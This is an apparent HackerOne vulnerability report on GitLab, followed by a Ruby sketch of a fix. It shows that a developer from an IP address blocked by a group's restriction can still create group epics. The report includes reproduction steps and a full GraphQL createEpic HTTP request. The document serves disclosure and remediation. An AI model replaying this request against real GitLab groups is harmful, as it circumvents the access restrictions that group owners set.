A Developer can still create group epic through GraphQL after an owner blocks IP addresses
HackerOne report #2395169 by 0x777
on 2024-02-29, assigned to @rshambhuni:
Report
Summary
Hi team,
As part of the group/project security settings, an owner can block certain IP addresses from accessing that group's resources (everything...). However, even if blocked, a user can still manage to create group epics.
Steps to reproduce:
1. Create a group and a project, and add a user as developer.
2. From the owner, navigate to https://gitlab.com/groups/YOUR_GRP/-/edit#js-permissions-settings and add any IP address other than the developer user's IP address under "Restrict access by IP address".
3. From the developer, navigate to https://gitlab.com/GRP/ and verify the 404.
From the developer, send the following request, but change the title of the group epic according to your preferences:
POST /api/graphql HTTP/2
Host: gitlab.com
Cookie: <cookie>;
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:122.0) Gecko/20100101 Firefox/122.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://gitlab.com/groups/awesomeman/-/epics/new
Content-Type: application/json
X-Csrf-Token: qPBi6Q24fqPAXtsrHNZwMRpUSkSwI3VwJVoi7Yc_vXJsZ2EFxz_f37rHx2kw1Vg9XJmQregGDy8UaToYpPynog
X-Gitlab-Version: 16.10.0-pre
X-Gitlab-Feature-Category: portfolio_management
Sentry-Trace: 4d2256f7b9a545e2b03cdce23bf62850-83497ee2e34acbf9
Baggage: sentry-environment=gprd,sentry-release=fa5dbb9724c,sentry-public_key=f5573e26de8f4293b285e556c35dfd6e,sentry-trace_id=4d2256f7b9a545e2b03cdce23bf62850
Content-Length: 488
Origin: https://gitlab.com
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
Te: trailers
{"operationName":"createEpic","variables":{"input":{"addLabelIds":[34722769],"groupPath":"awesomeman","title":"testterme","description":"hfdh fdhfjd fdhdfhjj fdhfdhhfd","confidential":false,"startDateFixed":null,"startDateIsFixed":false,"dueDateFixed":null,"dueDateIsFixed":false,"color":"#1068bf"}},"query":"mutation createEpic($input: CreateEpicInput!) {\n createEpic(input: $input) {\n epic {\n id\n webUrl\n __typename\n }\n errors\n __typename\n }\n}\n"}
4. Verify the successful response and, from the owner, verify the group epic was created.
Video POC:
[REDACTED]
Impact
Users from banned IP addresses can still create group epics, where they should be completely blocked from accessing anything that belongs to that group.
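The root cause the report describes is an access check that the web UI applies (the 404 in step 3) but the GraphQL mutation does not. The following Ruby sketch is an added illustration, not GitLab's own code: it models a group-level IP allowlist (the "Restrict access by IP address" setting works as an allowlist, which is why adding an address other than the developer's blocks the developer) and applies it inside a hypothetical createEpic resolver before any membership logic runs, so every entry point gives a blocked client the same answer. The class, struct and function names are assumptions; the IP ranges and group path are constructed sample data.

```ruby
require 'ipaddr'

# Constructed example: a group-level IP allowlist (empty list means unrestricted).
# Not GitLab's implementation; the names below are assumptions for illustration.
class GroupIpRestriction
  def initialize(allowed_ranges)
    @ranges = allowed_ranges.map { |r| IPAddr.new(r) }
  end

  # True when no restriction is configured or the client IP is inside a range.
  def allows?(client_ip)
    return true if @ranges.empty?
    ip = IPAddr.new(client_ip)
    @ranges.any? { |range| range.include?(ip) }
  end
end

# Hypothetical group record: path, its IP restriction, and the epics it holds.
Group = Struct.new(:path, :ip_restriction, :epics)

# Hypothetical GraphQL-style mutation resolver. The IP restriction is checked
# first, before membership or permission checks, so a blocked address gets the
# same "not found" style answer the web UI gives instead of a created epic.
def create_epic(group, client_ip, title:)
  unless group.ip_restriction.allows?(client_ip)
    return { epic: nil, errors: ["Resource not available"] }
  end
  epic = { id: group.epics.size + 1, title: title }
  group.epics << epic
  { epic: epic, errors: [] }
end

# Sample run with constructed data (allowlist 203.0.113.0/24; 198.51.100.7 is outside it).
def demo
  group = Group.new("awesomeman", GroupIpRestriction.new(["203.0.113.0/24"]), [])
  blocked = create_epic(group, "198.51.100.7", title: "from blocked ip")
  allowed = create_epic(group, "203.0.113.42", title: "from allowed ip")
  [blocked, allowed, group.epics.size]
end

if __FILE__ == $PROGRAM_NAME
  blocked, allowed, count = demo
  puts "blocked: #{blocked.inspect}"
  puts "allowed: #{allowed.inspect}"
  puts "epics stored: #{count}"
end
```

The design point is that the restriction lives in one place and is consulted by every code path that touches group resources; a check bolted only onto the HTML controllers leaves the API and GraphQL routes open, which is exactly the gap this report exercises.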
Attachments
Warning: Attachments received through HackerOne, please exercise caution!
[REDACTED]
How To Reproduce